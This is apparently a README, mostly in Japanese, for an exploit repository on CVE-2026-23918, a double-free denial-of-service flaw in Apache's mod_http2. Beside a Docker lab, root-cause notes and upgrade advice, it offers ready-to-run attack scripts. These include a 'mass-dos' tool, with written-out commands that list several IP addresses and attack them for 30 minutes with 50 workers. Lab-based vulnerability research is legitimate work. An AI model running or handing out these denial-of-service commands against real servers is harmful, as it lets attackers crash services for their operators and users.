
CVE-2026-23918 | Apache HTTP Server 2.4.66 | CWE-415: Double Free | CVSS 8.8 | 2.4.67 で修正
mod_http2(h2_mplx.c)のダブルフリー脆弱性により、リモートの攻撃者が急速な RST_STREAM フレームを送信して c1c2_stream_joined() と m_stream_cleanup() の間の競合状態を引き起こし、サービス拒否(ワーカーのクラッシュ)を引き起こすことができます。
# 1. Start the lab
docker-compose up --build -d
# 2. Run the PoC
pip3 install h2
python3 poc.py --target 127.0.0.1 --port 8443
# 3. Watch the crash
docker logs -f apache-lab
# 4. Clean up
docker-compose down -v
結果: サーバーは
SIGSEGVで 約30秒〜3分 以内にクラッシュします — 信頼性の高い DoS が確認されました。
| File | 説明 |
|---|---|
poc.py | Rapid-RST — 高速攻撃。30秒〜3分でサーバーをクラッシュ |
exploits/slow-drip.py | Slow Drip — 低帯域幅での持続的攻撃 |
exploits/mass-dos.py | Mass DoS — 複数ターゲットへの持続的 DoS |
# Create target list
echo "192.168.1.100:8443" > targets.txt
echo "10.0.0.50:8443" >> targets.txt
# Attack 10 targets for 30 minutes
python3 exploits/mass-dos.py --targets targets.txt --duration 30 --workers 50 --intensity 7
この脆弱性は以下の条件で発動します:
c1c2_stream_joined() と m_stream_cleanup() の両方によって同時に結合されるm->spurge に追加するh2_purge_then_destroy() がストリームを2回破棄する → ダブルフリー → セグメンテーションフォールト
Apache 2.4.67 以降にアップグレード してください。
完全な脆弱性分析、根本原因の解説、エクスプロイトのメモ、および修復ガイダンス: → rhasan.com/CVE-2026-23918
| 発見者 | Bartlomiej Dmitruk (striga.ai) · Stanislaw Strzalkowski (isec.pl) |
| 報告日 | 2025-12-10 |
| 修正バージョン | Apache 2.4.67 |
⭐ このリポジトリが役に立ったらスターを付けてください!